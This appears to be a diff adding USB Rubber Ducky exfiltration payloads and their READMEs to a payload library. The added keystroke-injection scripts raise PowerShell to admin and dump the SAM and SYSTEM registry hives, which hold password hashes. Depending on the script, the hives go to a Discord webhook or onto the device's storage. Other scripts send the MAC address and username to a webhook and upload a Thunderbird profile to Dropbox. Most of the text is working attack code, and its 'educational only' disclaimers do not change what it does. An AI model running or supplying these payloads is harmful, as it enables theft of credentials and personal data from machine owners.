 REM You must define the Discord server name i.e. Hak5
 DEFINE #SERVER_NAME example
 
 REM You must define your Discord webhook if you want to use this method for the exfiltration
 DEFINE #DISCORD_WEBHOOK example
 
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
 REM Open Discord app
 GUI
 DELAY 1000
@@ -74,11 +118,11 @@ TAB
 DELAY 500
 TAB
 DELAY 500
-DOWN_ARROW
+DOWNARROW
 DELAY 500
-DOWN_ARROW
+DOWNARROW
 DELAY 500
-DOWN_ARROW
+DOWNARROW
 DELAY 500
 ENTER
 DELAY 500

payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/README.md

@@ -0,0 +1,25 @@
+# Exfiltrate Mac Address - MacOS
+
+This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
+
+### Details
+
+- **Title**: Exfiltrate Mac Address
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Exfiltration
+- **Target**: MacOS
+
+### Dependencies
+
+- Set the #WEBHOOK to complete the exfiltration
+   `DEFINE #WEBHOOK example`
+
+## How It Works 📜
+
+1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
+2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
+3. After readiness is confirmed, the script:
+   - Runs commands to open **Terminal**.
+   - Acquire the mac address and the system user name
+   - Send this informations through the Webhook

payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt

@@ -0,0 +1,55 @@
+REM_BLOCK
+####################################################
+#                                                  #
+# Title        : Exfiltrate Mac Address - MacOS    #
+# Author       : bst04 - Aleff                     #
+# Version      : 1.0                               #
+# Category     : Exfiltration                      #
+# Target       : MacOS                             #
+#                                                  #
+####################################################
+END_REM
+
+REM Set the #WEBHOOK to complete the exfiltration
+DEFINE #WEBHOOK example
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
+DELAY 200
+
+GUI SPACE
+DELAY 250
+STRINGLN TERMINAL
+DELAY 750
+STRINGLN mac=$(networksetup -getmacaddress en0) 
+DELAY 750
+STRINGLN name=$(id -un)
+DELAY 850
+STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK

payloads/library/exfiltration/IP-Out/README.md

@@ -0,0 +1,12 @@
+# IP-OUT
+This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
+
+
+
+
+
+## Useful Tips
+
+**Change #DRIVELABEL to your own personal drive label if it isn't already**
+
+Remember: Do not use this for unethical hacking practices! This is for educational purposed only!

payloads/library/exfiltration/IP-Out/payload.txt

@@ -0,0 +1,63 @@
+REM Title: IP-Out
+REM Author: Mavisinator30001
+REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
+REM Target: Any Windows System
+REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
+DEFINE #DRIVELABEL DUCKY
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+IF $_OS != WINDOWS
+    STOP_PAYLOAD
+END_IF
+ATTACKMODE HID STORAGE
+DELAY 500
+GUI r
+DELAY 300
+STRINGLN Powershell
+DELAY 1000
+STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
+WAIT_FOR_STORAGE_ACTIVITY
+WAIT_FOR_STORAGE_INACTIVITY
+ALT F4
+ATTACKMODE OFF
+HIDE_PAYLOAD

payloads/library/exfiltration/NTLM_ducky/README.md

@@ -0,0 +1,29 @@
+# Exfiltrate NTLM Hash - Windows ✅
+
+A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
+
+## Description
+
+This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
+
+
+### Settings
+
+- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
+- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align="center">
+  <table>
+    <tr>
+      <td align="center" width="96">
+        <a href="https://github.com/luu176">
+          <img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
+        </a>
+        <br>GitHub
+      </td>
+    </tr>
+  </table>
+</div>

payloads/library/exfiltration/NTLM_ducky/payload.txt

@@ -0,0 +1,81 @@
+REM_BLOCK
+TITLE           Exfiltrate NTLM Hash Files onto Ducky Storage
+AUTHOR          Luu176
+DESCRIPTION     This payload exfiltrates NTLM hash files (which contain hashed passwords for users 
+                on the current Windows device) to the Rubber Ducky's SD card for further analysis. 
+                It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to 
+                the defined storage drive on the Ducky device.
+END_REM
+
+DEFINE #driveLabel DUCKY
+REM below you can set the number of blinks for the caps lock when finished (default 9)
+DEFINE #numBlinks 9
+
+ATTACKMODE HID STORAGE
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+IF ($_CAPSLOCK_ON == TRUE)
+    CAPSLOCK
+END_IF
+GUI d
+DELAY 1000
+GUI r
+DELAY 500
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 800
+STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
+GUI d
+WAIT_FOR_CAPS_ON 
+REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
+VAR $i = 0
+WHILE ( $i < #numBlinks )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE

payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md

@@ -0,0 +1,103 @@
+# Save Your Thunderbird Settings via Dropbox
+
+Thunderbird version, build ID, user agent, host machine information (RAM, available space, GPU...), email account configuration and much more available through this juicy Thunderbird feature.
+
+This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. It can be used, for istance, in case you have a lot of devices and want to quickly and manually save every single Thunderbird configuration.
+
+**Alert!** I have also uploaded my personal Dropbox token, please don't use it because I need it for my own stuff!
+
+**Category:** Exfiltration
+
+## Index
+
+- [Overview](#overview)
+- [Requirements](#requirements)
+- [Test Environment](#test-environment)
+- [Configuration](#configuration)
+- [Functionality](#functionality)
+  - [System Detection](#system-detection)
+  - [Opening Thunderbird](#opening-thunderbird)
+  - [Copying Profile Folder Path](#copying-profile-folder-path)
+  - [Opening PowerShell and Uploading to Dropbox](#opening-powershell-and-uploading-to-dropbox)
+- [Notes](#notes)
+- [Credits](#credits)
+
+## Overview
+
+This program automates the process of saving your Thunderbird settings to Dropbox. It is designed for Windows 10/11 systems and falls under the exfiltration category. The main functionality includes detecting the system state, opening Thunderbird, copying the profile folder path, compressing the profile folder, and uploading it to Dropbox.
+
+## Requirements
+
+- **Dropbox Access Token:** You need a valid Dropbox access token to upload the file.
+- **PowerShell:** The script uses PowerShell to execute commands and interact with the filesystem.
+- **Thunderbird:** In order to exfiltrate the Thunderbird configuration, it is essential to have Thunderbird configured...obvious right? And yet...
+
+## Test Environment
+
+- Thunderbird 115.11.1 (64 bit)
+- Windows 10 Pro
+
+## Configuration
+
+Before running the program, ensure to set the following parameters (*except #DROPBOX_API_CONST that is a constant*) correctly/as you prefer:
+
+```plaintext
+DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==
+DEFINE #ARCHIVE_NAME cache.zip
+DEFINE #DROPBOX_FOLDER_PATH /
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+```
+- `#ACCESS_TOKEN`: Your private Dropbox access token
+- `#ARCHIVE_NAME`: The name of the archive file to be created (e.g., `cache.zip`).
+- `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded (e.g., `/`).
+
+## Functionality
+
+### System Detection
+
+The program starts by detecting whether the system reflects the CAPSLOCK state. This is used to set a dynamic boot delay. If CAPSLOCK is not reflected, a maximum delay of 3000ms is applied.
+
+### Opening Thunderbird
+
+The script then opens Thunderbird and navigates through the settings to locate the profile folder. This path is copied to the clipboard for further use.
+
+### Copying Profile Folder Path
+
+The copied path of the Thunderbird profile folder is used to compress the profile data into a ZIP file.
+
+### Opening PowerShell and Uploading to Dropbox
+
+Using PowerShell, the script performs the following actions:
+
+1. **Navigate to TEMP Directory:** Changes the directory to the temporary environment path.
+2. **Stop Thunderbird Process:** Stops the Thunderbird process to ensure the profile data is not being used.
+3. **Compress Profile Folder:** Compresses the profile folder into a ZIP file.
+4. **Upload to Dropbox:** Uploads the ZIP file to the specified Dropbox folder using the Dropbox API.
+5. **Cleanup:** Removes the local ZIP file after the upload is complete.
+
+## Notes
+
+- This program was created for educational and demonstrative purposes. Unauthorized access and exfiltration of data is illegal.
+- Ensure you have the necessary permissions before running any script that modifies or transfers personal or sensitive data.
+
+## Credits
+
+<h2 align="center"><a href="https://aleff-gitlab.gitlab.io/">Aleff</a></h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt

@@ -0,0 +1,105 @@
+REM ##############################################################
+REM #                                                            #
+REM # Title       : Save Your Thunderbird Settings via Dropbox   #
+REM # Author      : Aleff                                        #
+REM # Version	  : 1.0                                          #
+REM # Category	  : Exfiltration                                 #
+REM # Target	  : Windows 10/11                                #
+REM #                                                            #
+REM ##############################################################
+
+REM Required: Set here your Dropbox access TOKEN
+DEFINE #ACCESS_TOKEN example-access-token
+DEFINE #ARCHIVE_NAME cache.zip
+DEFINE #DROPBOX_FOLDER_PATH /
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+GUI r
+STRING thunderbird
+ENTER
+DELAY 1000
+REPEAT 4 TAB
+DELAY 500
+ENTER
+DELAY 500
+REPEAT 2 UPARROW
+DELAY 500
+ENTER
+DELAY 500
+REPEAT 3 UPARROW
+DELAY 500
+ENTER
+DELAY 500
+
+REM Inside the settings
+REPEAT 11 TAB
+DELAY 500
+ENTER
+DELAY 500
+
+REM INSIDE THE PROFILE FOLDER
+REPEAT 4 TAB
+DELAY 500
+ENTER
+DELAY 500
+CTRL c
+DELAY 500
+ALT F4
+DELAY 500
+GUI r
+STRING powershell
+ENTER
+DELAY 1500
+
+STRINGLN cd $env:TEMP
+DELAY 500
+STRINGLN Stop-Process -Name "thunderbird" -Force
+DELAY 500
+STRING Compress-Archive -LiteralPath 
+DELAY 500
+CTRL v
+DELAY 500
+STRINGLN  -DestinationPath ./#ARCHIVE_NAME
+DELAY 1000
+
+STRINGLN_POWERSHELL
+    $filePath = "$env:TEMP/#ARCHIVE_NAME"
+    $filePath = $filePath -replace "\\", "/"
+    $dropboxPath = "#DROPBOX_FOLDER_PATH#ARCHIVE_NAME"
+    $accessToken = "#ACCESS_TOKEN"
+    $fileContent = [System.IO.File]::ReadAllBytes($filePath)
+    $headers = @{
+        "Authorization" = "Bearer $accessToken"
+        "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}")
+        "Content-Type" = "application/octet-stream"
+    }
+    Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit
+END_STRINGLN

payloads/library/exfiltration/System-Stealer/payload.txt

@@ -0,0 +1,74 @@
+REM TITLE System Stealer
+REM AUTHOR mavisinator30001
+REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
+REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
+REM DISCLAIMER This is for educational purposes ONLY
+DELAY 1000
+ATTACKMODE HID STORAGE
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+REM Change $DRIVELABEL to the storage label of your duck
+DEFINE #DRIVELABEL DUCKY
+IF ($_OS == WINDOWS) THEN
+    GUI r
+    DELAY 500
+    STRING powershell
+    DELAY 1000
+    CTRL-SHIFT-ENTER
+    DELAY 750
+    LEFT
+    ENTER
+    DELAY 1000
+    STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
+    DELAY 250
+    STRINGLN reg save HKLM\sam $DriveLetter/sam.save
+    WAIT_FOR_STORAGE_ACTIVITY
+    WAIT_FOR_STORAGE_INACTIVITY
+    STRINGLN reg save HKLM\system $DriveLetter/system.save
+    WAIT_FOR_STORAGE_ACTIVITY
+    WAIT_FOR_STORAGE_INACTIVITY
+    ALT F4
+ELSE
+    ATTACKMODE OFF
+    STOP_PAYLOAD
+END_IF

payloads/library/exfiltration/ntlm_exfiltration/README.md

@@ -0,0 +1,28 @@
+# Exfiltrate NTLM Hash - Windows ✅
+
+A script used to exfiltrate the NTLM hash on a Windows machine.
+
+## Description
+
+A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
+
+### Settings
+
+* Set the Discord webhook URL
+* Ensure the webhook permissions are configured
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/luu176">
+        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/exfiltration/ntlm_exfiltration/payload.txt

@@ -0,0 +1,34 @@
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+END_EXTENSION
+
+DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
+GUI d
+DELAY 1000
+GUI r
+DELAY 1000
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 3000
+LEFTARROW
+ENTER
+DELAY 3000
+STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
+DELAY 500
+GUI d

payloads/library/general/1_Script_to_Rule_Them_All/ReadMe.md

@@ -0,0 +1,5 @@
+## 1 Script to Rule Them All
+
+The purpose of this frankenstein mess is to use OS detection to run conditional code after, specific to the OS.
+
+It differs from just combining the two extensions in very few ways, but there are slight improvement tweaks from my own testing (hence the new name to avoid conflicts) and more documentation on the process within.

payloads/library/general/1_Script_to_Rule_Them_All/payload.txt

@@ -0,0 +1,293 @@
+REM Title: One Script To Rule Them All
+REM Author: Korben and UberGuidoZ
+REM Description: Attempt to detect OS then run conditional code based on result.
+REM Target: Windows, macOS, Linux, iOS, ChromeOS, Android, plus custom OS.
+REM Version: 1.6
+REM Category: All of them
+REM Source: https://github.com/UberGuidoZ/Hak5-USBRubberducky-Payloads
+
+EXTENSION OS_DETECTION_UBER
+    REM VERSION 2.0
+    REM AUTHOR: Korben and UberGuidoZ
+
+    REM_BLOCK DOCUMENTATION
+        USB Rubber Ducky Host OS Detection (moving target, may fall)
+        Results may vary greatly depending on a combination of many variables:
+         - number of testing stages
+         - specific devices and versions tested against
+         - number of systems testing for (scope)
+         - detection techniques (passive/invisible/active/hybrid)
+         - overall speed
+         - overall accuracy
+
+        If all you require is Windows vs <any other os> detection, the PASSIVE_WINDOWS_DETECT extension is recommended over this one.
+
+        TARGET:
+            DEFAULT - Windows, Mac, Linux
+            ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android, custom defined OS
+
+        USAGE:
+            Call DETECT_OS_UBER() anywhere in your payload after the extension.
+            Place this extension and the DETECT_OS_UBER() before you would like to first reference $_OS to execute payload code conditionally.
+
+        FEEDBACK:
+            As mentioned above, this a moving target (especially for macOS).
+            Please report any issues identifying specific operating systems with as much detail as possible.
+            Your feedback will greatly help solidify the robustness of this extension and others based on it.
+
+        DEBUGGING:
+            SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
+    END_REM
+
+    REM CONFIGURATION
+
+REM For Debugging (use if troubleshooting or reporting issues):
+    DEFINE #DEBUGGING_OUTPUT FALSE
+    DEFINE #ADVANCED_DETECTION FALSE
+
+REM Timing fine tuning:
+    DEFINE #STARTUP_DELAY 1500
+    DEFINE #RESTART_WAIT 1000
+    DEFINE #EXECUTE_DELAY 2000
+    DEFINE #CONNECT_WAIT 1000
+    DEFINE #OS_DETECT_MODE HID
+REM Define Apple keyboard to keep macOS happy
+    DEFINE #OS_DETECT_VID VID_05AC
+    DEFINE #OS_DETECT_PID PID_021E
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #HOST_RESPONSE_TIMEOUT 1000
+
+REM Start DETECT_OS function
+    FUNCTION DETECT_OS_UBER()
+        $_HOST_CONFIGURATION_REQUEST_COUNT = 0
+        ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
+        DELAY #STARTUP_DELAY
+        SAVE_HOST_KEYBOARD_LOCK_STATE
+
+REM Debugging if TRUE
+        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+            IF_DEFINED_TRUE #ADVANCED_DETECTION
+                STRING ADVANCED OS DETECT
+            ELSE_DEFINED
+                STRING OS DETECT
+            END_IF_DEFINED
+            ENTER
+            STRING test caps
+        END_IF_DEFINED
+
+        IF ($_CAPSLOCK_ON == FALSE) THEN
+            LED_R
+            CAPSLOCK
+            DELAY #HOST_RESPONSE_TIMEOUT
+        END_IF
+        LED_OFF
+
+        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+            ENTER
+            STRING test done
+        END_IF_DEFINED
+
+        IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
+            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                ENTER
+                STRING received led response
+            END_IF_DEFINED
+            LED_G
+            IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Prediction: Windows
+                END_IF_DEFINED
+                $_OS = WINDOWS
+            ELSE
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Prediction: Linux
+                END_IF_DEFINED
+                $_OS = LINUX
+            END_IF
+        ELSE
+            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                ENTER
+                STRING No LED response
+                ENTER
+                STRING Prediciton: MacOS
+            END_IF_DEFINED
+            $_OS = MACOS
+        END_IF
+
+        IF_DEFINED_TRUE #ADVANCED_DETECTION
+            IF ( $_OS == LINUX ) THEN
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Soft reconnect
+                END_IF_DEFINED
+                ATTACKMODE OFF
+                DELAY #RESTART_WAIT
+                ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
+                DELAY #CONNECT_WAIT
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Reconnected
+                END_IF_DEFINED
+                IF ($_CAPSLOCK_ON == TRUE) THEN
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING Caps LED on
+                        ENTER
+                        STRING Test numlock
+                    END_IF_DEFINED
+                    NUMLOCK
+                    DELAY #HOST_RESPONSE_TIMEOUT
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING Test done
+                    END_IF_DEFINED
+                    IF ($_NUMLOCK_ON == FALSE) THEN
+                        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                            ENTER
+                            STRING No numlock LED
+                            ENTER
+                            STRING Prediciton: ChromeOS
+                        END_IF_DEFINED
+                        $_OS = CHROMEOS
+                    ELSE
+                        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                            ENTER
+                            STRING Numlock LED on
+                            ENTER
+                            STRING Testing scrolllock
+                        END_IF_DEFINED
+                        SCROLLLOCK
+                        DELAY #HOST_RESPONSE_TIMEOUT
+                        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                            ENTER
+                            STRING Test done
+                        END_IF_DEFINED
